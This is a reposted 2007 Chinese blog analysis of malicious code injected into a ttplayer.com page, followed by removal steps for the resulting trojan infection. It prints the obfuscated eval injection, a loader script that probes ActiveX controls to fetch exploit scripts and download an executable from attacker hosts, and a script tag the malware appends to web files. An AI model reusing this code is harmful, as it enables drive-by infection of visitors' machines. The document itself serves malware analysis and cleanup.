作者:清新阳光 (
http://hi.baidu.com/newcenturysun)
日期:2007/12/22 (转载请保留此声明)
挂马地址:
hxxp://wwwcnc.ttplayer.com/index.php网页前半部分被挂的代码:<SCRIPT>eval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\134\57\134\57\141\141\56\154\154\163\147\151\156\147\56\143\157\155\134\57\167\167\134\57\156\145\167\62\70\60\56\150\164\155\77\60\61\66\40\167\151\144\164\150\75\61\40\150\145\151\147\150\164\75\61\76\74\134\57\151\146\162\141\155\145\76\42\51");</script><html>
解密后为指向hxxp:\/\/aa.llsging.com\/ww\/new280.htm?016
继续
hxxp:\/\/aa.llsging.com\/ww\/new280.htm?016解密后指向
hxxp://a5.llsging.com/aa/nini.htm
hxxp://a5.llsging.com/aa/gege.htm
hxxp://a5.llsging.com/aa/nini.htm代码:
<SCRIPT LANGUAGE='JavaScript'>
function ResumeError() {
return true;
}
window.onerror = ResumeError;
</SCRIPT>
<SCRIPT LANGUAGE="JavaScript">
eval("/*<SCRIPT LANGUAGE='JavaScript'>
function ResumeError() {
return true;
}
window.onerror = ResumeError;
</SCRIPT>*/
function init(){document.write()}window.onload=init;if(document.cookie.indexOf('OK')==-1){try{var e;var ado=(document.createElement("object"));ado.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");var as=ado.createobject("Adodb.Stream","")}catch(e){};finally{var expires=new Date();expires.setTime(expires.getTime()+24*60*60*1000);document.cookie='iepl=orer;path=/;expires='+expires.toGMTString();if(e!="[object Error]"){document.write("<script src=http:\/\/a5.llsging.com\/aa\/11.js><\/script>")}else{try{var f;var storm=new ActiveXObject("MPS.StormPlayer")}catch(f){};finally{if(f!="[object Error]"){document.write("<script src=http:\/\/a5.llsging.com\/aa\/bb.js><\/script>")}}try{var g;var pps=new ActiveXObject("POWERPLAYER.PowerPlayerCtrl.1")}catch(g){};finally{if(g!="[object Error]"){document.write("<script src=http:\/\/a5.llsging.com\/aa\/ppp.js><\/script>")}}try{var h;var obj=new ActiveXObject("BaiduBar.Tool")}catch(h){};finally{if(h!="[object Error]"){obj.DloadDS("http://down.llsging.com/bb/bd.cab","bd.exe",0)}}if(f=="[object Error]"&&g=="[object Error]"&&h=="[object Error]"){document.write("<iframe width='10' height='10' src='http://a5.llsging.com/aa/bf.html'></iframe>")}}}}")
</SCRIPT>
hxxp:\/\/a5.llsging.com\/aa\/11.js MS06-014漏洞
hxxp:\/\/a5.llsging.com\/aa\/bb.js 暴风影音漏洞
hxxp:\/\/a5.llsging.com\/aa\/ppp.js PPStream漏洞?
hxxp://down.llsging.com/bb/bd.cab 百度toolbar
hxxp://a5.llsging.com/aa/gege.htm不会解密 希望大家帮下忙...
最后下载的仍是一个木马下载者
由于本人才疏学浅,网页解密部分的分析可能存在错误,还请大家指教
下面是该木马下载者的简要分析
File: ntuser.com
Size: 31792 bytes
Modified: 2007年12月22日, 10:19:44
MD5: 5EE5CC57AAD61F73420F874433E526A5
SHA1: 24141C18ACB87CB8E54D924C2E117B8F44926598
CRC32: 605FE6B3
1.病毒运行后,释放如下副本以及文件:
%systemroot%\system32\wxptdi.sys
2.释放一个批处理停止Windows 防火墙服务
3.检测进程中是否存在AVP.exe 如果存在则把时间改为2001年
4.启动一个空壳的wuauclt.exe 把%systemroot%\system32\wxptdi.sys(其实和ntuser.com是同一个文件)的代码完全注入进去
5.感染全盘的php jsp asp htm html文件 在后面写入<script language=javascript src=http://cc.18dd.net/1.js></script>的代码
6.wuauclt.exe执行下载木马的操作
读取
http://*.com/elf_listo.txt的文件列表
下载27个木马和病毒 到c:\Program Files下面 分别命名为csrss0.exe~csrss9.exe csrssa.exe~csrsst.exe
木马感染后的sreng日志如下:
启动项目
注册表
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
<SSLDyn><%systemroot%\SSLDyn.exE> []
<cmdbcs><%systemroot%\cmdbcs.exe> []
<WinSysM><%systemroot%\608769M.exe> []
<WinSysW><%systemroot%\608769L.exe> []
<Kvsc3><%systemroot%\Kvsc3.exE> []
<AVPSrv><%systemroot%\AVPSrv.exE> []
<NVDispDrv><%systemroot%\aorwpw.exe> [N/A]
<DbgHlp32><%systemroot%\DbgHlp32.exe> []
==================================
驱动程序
[RAS Asynchronous Media Driver / AsyncMac][Running/Auto Start]
<system32\DRIVERS\msconkt.sys><N/A>(之前的comint32.sys,GD*I32.dll,bj*rl.dll,addr*help.dll木马群变种)
[RAS Asynchronous Media Driver / CCDECODE][Running/Auto Start]
<system32\DRIVERS\msconkt.sys><N/A>
[PciHardDisk / PciHardDisk][Stopped/Manual Start]
<\??\%systemroot%\system32\fat32.sys><N/A>(机器狗病毒变种)
==================================
正在运行的进程
[PID: 1740][%systemroot%\Explorer.EXE] [Microsoft Corporation, 6.00.2900.2180 (xpsp_sp2_rtm.040803-2158)]
[%systemroot%\608769MM.DLL] [N/A, ]
[%systemroot%\608769WL.DLL] [N/A, ]
[%systemroot%\system32\SSLDyn.dll] [N/A, ]
[%systemroot%\system32\cmdbcs.dll] [N/A, ]
[%systemroot%\system32\Kvsc3.dll] [N/A, ]
[%systemroot%\system32\AVPSrv.dll] [N/A, ]
[%systemroot%\system32\DbgHlp32.dll] [N/A, ]
[PID: 524][C:\Program Files\VMware\VMware Tools\VMwareService.exe] [VMware, Inc., 6.0.1 build-55017]
[%systemroot%\system32\GDQQHXI32.dll] [N/A, ]
[%systemroot%\system32\GDDTHXI32.dll] [N/A, ]
[%systemroot%\system32\GDJZI32.dll] [N/A, ]
[%systemroot%\system32\GDQQSGI32.dll] [N/A, ]
[%systemroot%\system32\GDZYZJI32.dll] [N/A, ]
[%systemroot%\system32\GDDJI32.dll] [N/A, ]
[%systemroot%\system32\GDGFSJI32.dll] [N/A, ]
[%systemroot%\system32\GDMSI32.dll] [N/A, ]
[%systemroot%\system32\GDZXI32.dll] [N/A, ]
[%systemroot%\system32\GDWDI32.dll] [N/A, ]
[%systemroot%\system32\GDGJI32.dll] [N/A, ]
[%systemroot%\system32\GDWLI32.dll] [N/A, ]
[%systemroot%\system32\GDFYI32.dll] [N/A, ]
[%systemroot%\system32\GDZYHXI32.dll] [N/A, ]
[%systemroot%\system32\GDHnXaI32.dll] [N/A, ]
[%systemroot%\system32\GDZHTUI32.dll] [N/A, ]
[%systemroot%\system32\GDWMI32.dll] [N/A, ]
[%systemroot%\system32\GDJX2I32.dll] [N/A, ]
清除办法:
下载sreng:
http://download.kztechs.com/files/sreng2.zip
Xdelbox:
http://www.dodudou.com/down/里面的原创软件文件夹下
1.解压缩Xdelbox
在 添加旁边的框中 输入
%systemroot%\system32\drivers\msconkt.sys
%systemroot%\system32\AVPSrv.dll
%systemroot%\system32\cmdbcs.dll
%systemroot%\system32\DbgHlp32.dll
%systemroot%\system32\Kvsc3.dll
%systemroot%\system32\LYLOADER.EXE
%systemroot%\system32\LYMANGR.DLL
%systemroot%\system32\MSDEG32.DLL
%systemroot%\system32\NVDispDrv.dll
%systemroot%\system32\REGKEY.hiv
%systemroot%\system32\SSLDyn.dll
%systemroot%\system32\wxptdi.sys
%systemroot%\608769L.exe
%systemroot%\608769M.exe
%systemroot%\608769MM.DLL
%systemroot%\608769WL.DLL
%systemroot%\AVPSrv.exE
%systemroot%\cmdbcs.exe
%systemroot%\DbgHlp32.exe
%systemroot%\Kvsc3.exE
%systemroot%\NVDispDRV.EXE
%systemroot%\SSLDyn.exE
%systemroot%\system32\fat32.sys(%systemroot%为环境变量,表示你的系统文件夹安装位置,对于系统盘安装在C盘的XP用户即为%systemroot% 以此类推)
输入完一个以后 点击旁边的添加 按钮 被添加的文件 将出现在下面的大框中
右键 点击右键菜单中的 “立即重启执行删除”
重启计算机以后 会有两个系统进入的选择的倒计时界面
第一个是你原来的windows系统
第二个是这个软件给你设定的dos系统
系统会自动选择进入第二个系统
类似dos的界面滚动完毕以后 病毒就被删除了
之后会自动重启进入正常模式
2.重启之后
打开sreng
启动项目 注册表 删除如下项目
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
<SSLDyn><%systemroot%\SSLDyn.exE> []
<cmdbcs><%systemroot%\cmdbcs.exe> []
<WinSysM><%systemroot%\608769M.exe> []
<WinSysW><%systemroot%\608769L.exe> []
<Kvsc3><%systemroot%\Kvsc3.exE> []
<AVPSrv><%systemroot%\AVPSrv.exE> []
<NVDispDrv><%systemroot%\aorwpw.exe> [N/A]
<DbgHlp32><%systemroot%\DbgHlp32.exe> []
在“启动项目”-“服务”-“驱动程序”中点“隐藏经认证的微软项目”,
选中以下项目,点“删除服务”,再点“设置”,在弹出的框中点“否”:
[RAS Asynchronous Media Driver / AsyncMac][Running/Auto Start]
<system32\DRIVERS\msconkt.sys><N/A>(之前的comint32.sys变种)
[RAS Asynchronous Media Driver / CCDECODE][Running/Auto Start]
<system32\DRIVERS\msconkt.sys><N/A>
[PciHardDisk / PciHardDisk][Stopped/Manual Start]
<\??\%systemroot%\system32\fat32.sys><N/A>(机器狗病毒变种)
3.清除机器狗病毒
参考
http://hi.baidu.com/newcenturysu ... 1da2aca40f5236.html
解决方法第三点即可
4.清除GD*I32.dll,bj*rl.dll,addr*help.dll木马群
参考
http://hi.baidu.com/newcenturysu ... add2ab5fdf0e65.html即可
5.修复被感染的网页文件
推荐使用CSI的iframkill
下载地址:
http://www.vaid.cn/blog/read.php?9(※本文转自:华师后院http://www.myscnu.com)
